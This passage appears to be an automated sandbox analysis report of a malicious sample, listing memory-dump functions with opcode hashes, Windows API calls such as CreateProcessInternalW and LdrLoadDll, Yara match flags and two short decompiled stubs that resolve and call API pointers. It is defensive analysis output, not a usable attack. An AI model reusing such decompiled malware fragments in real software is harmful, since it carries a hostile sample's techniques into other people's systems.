Instruction Fuzzy Hash: 0F9002A1262042525A45B15964045074106A7E0382BA1D022A1414950C85669866E661

Uniqueness

Uniqueness Score: -1.00%

Function 00C29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2986A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7001ba38825500b9d33a44d3e4e3cd78640de42d83b3797de7059699bf384c15
Instruction ID: 9a3c58faf831501713a7faac86d6f7203fe7570b4759844caf6d2bb869c5526b
Opcode Fuzzy Hash: 7001ba38825500b9d33a44d3e4e3cd78640de42d83b3797de7059699bf384c15
Instruction Fuzzy Hash: 2F9002B122100513D61161596504707010997D0382FA1D422A0424558D96968962F161

Uniqueness

Uniqueness Score: -1.00%

Function 00C295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C295DA

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b831c5b35d8ef2bb439e0de0724ca3431d5fd57bfbabbbf130ded90d525e2917
Instruction ID: d63502936edb218a4910c52bed4b2ce5ee4ac5441caaf1539836562c0d2840eb
Opcode Fuzzy Hash: b831c5b35d8ef2bb439e0de0724ca3431d5fd57bfbabbbf130ded90d525e2917
Instruction Fuzzy Hash: 089002E122200103460571596414616410A97E0342F61D031E1014590DC56588A1B165

Uniqueness

Uniqueness Score: -1.00%

Function 00C299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C299AA

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f5f82946adf09f22b69090f25e8795fcf5c11cd4b42d0197f6224135522f505
Instruction ID: e4f029cec82d6a86c65a8120fe88f39695796ba7c84026680bd3696dca816ed5
Opcode Fuzzy Hash: 6f5f82946adf09f22b69090f25e8795fcf5c11cd4b42d0197f6224135522f505
Instruction Fuzzy Hash: D69002E136100542D60061596414B060105D7E1342F61D025E1064554D8659CC62B166

Uniqueness

Uniqueness Score: -1.00%

Function 00C29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2954A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4cc4ea42f04127c70e04a5ada7a5076231243e9972f10cbc26aa647a0ad6b94
Instruction ID: 1873bbc5dcde0ee127bee4422d8bcf8025d61d33931aac1c51d680620f50be9b
Opcode Fuzzy Hash: f4cc4ea42f04127c70e04a5ada7a5076231243e9972f10cbc26aa647a0ad6b94
Instruction Fuzzy Hash: AB9002A5231001030605A5592704507014697D5392761D031F1015550CD6618871A161

Uniqueness

Uniqueness Score: -1.00%

Function 00C29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2991A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c533a14d57357a33fbe53b705d508a269f1b8ea95e4c19ae081b33ba3abff7d
Instruction ID: 23b99a5d76061c61115c10ff5841c7415cc9d17ae5d7e6029e117488f08cb040
Opcode Fuzzy Hash: 9c533a14d57357a33fbe53b705d508a269f1b8ea95e4c19ae081b33ba3abff7d
Instruction Fuzzy Hash: BA9002F122100502D64071596404746010597D0342F61D021A5064554E86998DE5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C296EA

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d79c2ae86764de82117a4ef9a569a22fe7aa38f112d47a0f13ac5e2438cd8c21
Instruction ID: 06d6e714a2f0dbb4eb5a8526b0483c5562b3a55c6497e6c389d6d846a350f0d0
Opcode Fuzzy Hash: d79c2ae86764de82117a4ef9a569a22fe7aa38f112d47a0f13ac5e2438cd8c21
Instruction Fuzzy Hash: C29002B122108902D6106159A40474A010597D0342F65D421A4424658D86D588A1B161

Uniqueness

Uniqueness Score: -1.00%

Function 00C29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C29A5A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0406f766fc4d4c5098ed796d8da25b7152bea9ce20bf0a3ffdfb0ae6d6a2ed2e
Instruction ID: 353db2684c5f20af564f5aec65a6ab38479d96a5e9e524f5d5cd4c149451af3b
Opcode Fuzzy Hash: 0406f766fc4d4c5098ed796d8da25b7152bea9ce20bf0a3ffdfb0ae6d6a2ed2e
Instruction Fuzzy Hash: 2F9002A123180142D70065696C14B07010597D0343F61D125A0154554CC9558871A561

Uniqueness

Uniqueness Score: -1.00%

Function 00C29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2966A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6363e76ca408630fcb76138f9ac141f1f6d65bbf8df22108fc1deddab768825
Instruction ID: 1fe9aad4998b0cdf3efb747b868e61de304b009c8d2e6f97425621f0c72b9746
Opcode Fuzzy Hash: d6363e76ca408630fcb76138f9ac141f1f6d65bbf8df22108fc1deddab768825
Instruction Fuzzy Hash: 9F9002B122100902D6807159640464A010597D1342FA1D025A0025654DCA558A69B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00C29A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C29A0A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6e9c134469b95ffd6d142d733e5d62a83223da1514dd945f9349d30654b2e9a
Instruction ID: 9114985aa24bc681b554867fad4534ad4cf40590a2d8a7cadb36ab33af524329
Opcode Fuzzy Hash: a6e9c134469b95ffd6d142d733e5d62a83223da1514dd945f9349d30654b2e9a
Instruction Fuzzy Hash: 6D9002B122140502D6006159681470B010597D0343F61D021A1164555D86658861B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C29A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C29A2A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b350cd5f63288e978b8cb1ac245a28b68941da542df55121c20eff327c7b361
Instruction ID: 37d6741e778b67e525e258f509735cd24962c2f38a4d19d9cb5e1351e800ad28
Opcode Fuzzy Hash: 9b350cd5f63288e978b8cb1ac245a28b68941da542df55121c20eff327c7b361
Instruction Fuzzy Hash: 219002A16210014246407169A8449064105BBE1352B61D131A0998550D85998875A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C29FEA

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c0404a3354994e8f09d15d0f5fd064eb5b7306acaf17acf6a6dd94438a447ca
Instruction ID: 04f172d37548dfdb5678d9c9469622f095682201ad3e74545681784be15d5740
Opcode Fuzzy Hash: 9c0404a3354994e8f09d15d0f5fd064eb5b7306acaf17acf6a6dd94438a447ca
Instruction Fuzzy Hash: CF9002B133114502D6106159A404706010597D1342F61D421A0824558D86D588A1B162

Uniqueness

Uniqueness Score: -1.00%

Function 00C29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2978A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ccdcd734a3cccac4d1baf3e172f03c694fa2d2b9708145ad5fb67f2ff7ef8bbf
Instruction ID: 79e8d9f5ccc4c20ce49d8cd6860ebb09924dcad1c3b7c357dd4ef679aa9cbfab
Opcode Fuzzy Hash: ccdcd734a3cccac4d1baf3e172f03c694fa2d2b9708145ad5fb67f2ff7ef8bbf
Instruction Fuzzy Hash: CC9002A923300102D6807159740860A010597D1343FA1E425A0015558CC9558879A361

Uniqueness

Uniqueness Score: -1.00%

Function 00C297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C297AA

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f75ab0ea38b7ec2ece2033adfb09fa27f0dc58d5e8cbd9983349ac153b2b2c78
Instruction ID: 76a2fe996da77439df4b621c199f95d73d26ed08d99ab121d1585fe96718ed4b
Opcode Fuzzy Hash: f75ab0ea38b7ec2ece2033adfb09fa27f0dc58d5e8cbd9983349ac153b2b2c78
Instruction Fuzzy Hash: 0A9002A132100103D640715974186064105E7E1342F61E021E0414554CD9558866A262

Uniqueness

Uniqueness Score: -1.00%

Function 00C29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2971A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df4da7590279d9b1ea9e6dae23dbf6c6e4cbd652bd16a1c13a4b2c3b078c4170
Instruction ID: 46bef9d59f4d37452178e888d57326a6ea4e2d066a6f5e773087eee242f0fb79
Opcode Fuzzy Hash: df4da7590279d9b1ea9e6dae23dbf6c6e4cbd652bd16a1c13a4b2c3b078c4170
Instruction Fuzzy Hash: C19002B122100502D60065997408646010597E0342F61E021A5024555EC6A588A1B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00418550, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
processCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418550(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0x58de852
				_t3 = _t16 + 0xc80; // 0x408909
				_t34 = _t3;
				E00418DD0(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t5 =  &_a48; // 0x407c45
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed
				return _t22;
			}

0x00418553
0x00418556
0x00418562
0x00418562
0x0041856a
0x00418572
0x004185a4
0x004185a8

APIs

CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4

Strings

E|@D, xrefs: 00418572, 0041857F

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID: E|@D
API String ID: 2186235152-1370303659
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: 94e036b50fa194e4b03716d33ce7f49ba96107573156df30ea47add9cf45f2e3
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: 1E015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004184b7
0x004184c2
0x004184cd
0x004184d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184D2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: fc17abf0ff3ecae77acfdacc45e3c1b0e19fdd9160a7c93182ef8b7f3a05b9cb
Instruction ID: 085d91051521bfaec7df7f84f409b6a6da7ff6829facd29074c2a5ba81dfdffd
Opcode Fuzzy Hash: fc17abf0ff3ecae77acfdacc45e3c1b0e19fdd9160a7c93182ef8b7f3a05b9cb
Instruction Fuzzy Hash: 07E0EDB5204248BBD714EF24DC44EE73BA8EF84354F0446A8F9585B292CA31EA01CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418632, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: fc4e3c296da113e032d486bed29762ef6548cae52c1a2a8ffb056495fbedf6e5
Instruction ID: b265c353296288846772ee617a2ed05b1c04232bb557a47284f181d9a448f33f
Opcode Fuzzy Hash: fc4e3c296da113e032d486bed29762ef6548cae52c1a2a8ffb056495fbedf6e5
Instruction Fuzzy Hash: 4EF0A0F05083906BD710DF21D845A8B7FA89F89210F05859EFC881B142C531A415CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B23, Relevance: 1.5, APIs: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 300c7599e27420206f291554e94aef325a4029ea6556dd76e825ca773f6c2433
Instruction ID: a9c129f0337b369e739b705c268a1c4f179536cae23e9f0fa040b743f262041b
Opcode Fuzzy Hash: 300c7599e27420206f291554e94aef325a4029ea6556dd76e825ca773f6c2433
Instruction Fuzzy Hash: B5C08C30B49209AFC56085885402769B7A1D74A210F0002C2EC1C97A41D5211C708681

Uniqueness

Uniqueness Score: -1.00%

Function 00C2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C29694

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92d765e45ef9172e1cb371890a07baa50a885de1fd7e1832217736131eacab25
Instruction ID: a1fc24d8c54534ab95df6faf151f12cee720e17ac1feecf144922d6758bc047a
Opcode Fuzzy Hash: 92d765e45ef9172e1cb371890a07baa50a885de1fd7e1832217736131eacab25
Instruction Fuzzy Hash: 24B09BB19114D5C9DB51D76066087177A50B7D0741F26C071E1130681A4778C595F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00415682, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643792b69007a059b5f6ac22ef2f0d3e67dbc739f95090e8776bc4bfd41b3208
Instruction ID: 3bda7e9e15fc150d9fa05e489264a861284192abadf5826c9c7fd2d45a5bbaa8
Opcode Fuzzy Hash: 643792b69007a059b5f6ac22ef2f0d3e67dbc739f95090e8776bc4bfd41b3208
Instruction Fuzzy Hash: DFE0C036A992940FCB009DA688026F4FF74FA5317B75023EEC8C83B583C303A40346D8

Uniqueness

Uniqueness Score: -1.00%

Function 004162B5, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115feaf508e99ae5f3ffc1c9283829feddcc02a62b960f5287fee500f2964e2b
Instruction ID: bae42d604979c1ff3fbbab5642bcb059f168fbfabffe55bdd6d08e96a2ac8a11
Opcode Fuzzy Hash: 115feaf508e99ae5f3ffc1c9283829feddcc02a62b960f5287fee500f2964e2b
Instruction Fuzzy Hash: 56E02B2B8749185EC2348D7DD8408F4F7A0E70BA31B942FABC884D3292D216C04F87C5

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9A, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1483d1cfd0889dda6454ed522cbffba4a7b6742a049f3cd78e74dedd628406d5
Instruction ID: f2e5cc6d4aa551db247006215bb2ca3f988f3e1c5b4a64e412f39d4676854176
Opcode Fuzzy Hash: 1483d1cfd0889dda6454ed522cbffba4a7b6742a049f3cd78e74dedd628406d5
Instruction Fuzzy Hash: 4DC08C23EAA11A47E6218C0C68002B0E3658793075E0522E3DD44FB311DC4ACC8203CA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3FE, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa40ca9bd33330774804460bec7a68c40ffe44dd61434deb706494984444a7c5
Instruction ID: ebdb382ca564e1e39c7848299885895d6f92e3b666a3eb1c62a6e34329488050
Opcode Fuzzy Hash: fa40ca9bd33330774804460bec7a68c40ffe44dd61434deb706494984444a7c5
Instruction Fuzzy Hash: A8A0011BF860580285686C8A78611B4E375D6C747AE5032BBEE0DB39441A43C82501DE

Uniqueness

Uniqueness Score: -1.00%

Function 00C298A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d13e41dfaa820086bdca435f8af171aad692e948384cbc1da111b8e8273cde4c
Instruction ID: 2a121398ef9b92ca89617ee1d63622efa4a51beed5e5f6a1b214977b377770be
Opcode Fuzzy Hash: d13e41dfaa820086bdca435f8af171aad692e948384cbc1da111b8e8273cde4c
Instruction Fuzzy Hash: 2D9002A132100502D602615964146060109D7D1386FA1D022E1424555D86658963F172

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53c1331bd482d9e13ee015a25eb04473a310b1f6d692f8fd9306dc9549423ee
Instruction ID: 2fee95845be977b24b8a9bf53bd1b2e801f876338acd741bc4d2e88997b785e2
Opcode Fuzzy Hash: f53c1331bd482d9e13ee015a25eb04473a310b1f6d692f8fd9306dc9549423ee
Instruction Fuzzy Hash: 459002E1621141434A40B15968044065115A7E13427A1D131A0454560C86A88865E2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C29820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854a9f21923be1fb3fac7904e89905adbe72a93c5479e2abeeed3326fee38fd3
Instruction ID: 2e6d0f63ad8ae9328f064de67a8215b2198d33b76aced7c129c5ebab35495371
Opcode Fuzzy Hash: 854a9f21923be1fb3fac7904e89905adbe72a93c5479e2abeeed3326fee38fd3
Instruction Fuzzy Hash: E29002B126100502D641715964046060109A7D0382FA1D022A0424554E86958A66FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C299D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b09a1bc9bc9afbefa2c62d72025f6b89f24a50f1ac9473446c7d076f30b4a35
Instruction ID: cfa079f52e590e074eeb73f9c0d0da38ed7fafa9f9a3c8cd6feb04f65b1fe7b5
Opcode Fuzzy Hash: 4b09a1bc9bc9afbefa2c62d72025f6b89f24a50f1ac9473446c7d076f30b4a35
Instruction Fuzzy Hash: 469002E123100142D60461596404706014597E1342F61D022A2154554CC5698C71A165

Uniqueness

Uniqueness Score: -1.00%

Function 00C295F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfe28906cf7e24234d511a4fcfe8718cff6ebe27d0e4528779c4232cf8da96b
Instruction ID: 54eb6a571303f7ec75e834ed2f8fce56d9f6c7585ce7ef319ddbd3fa214998ef
Opcode Fuzzy Hash: 8cfe28906cf7e24234d511a4fcfe8718cff6ebe27d0e4528779c4232cf8da96b
Instruction Fuzzy Hash: E69002B122100902D60461596804686010597D0342F61D021A6024655E96A588A1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00C29950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5327e0f319e37b00d3350855d3bd838e13548840f1ee85600155f8a68142153
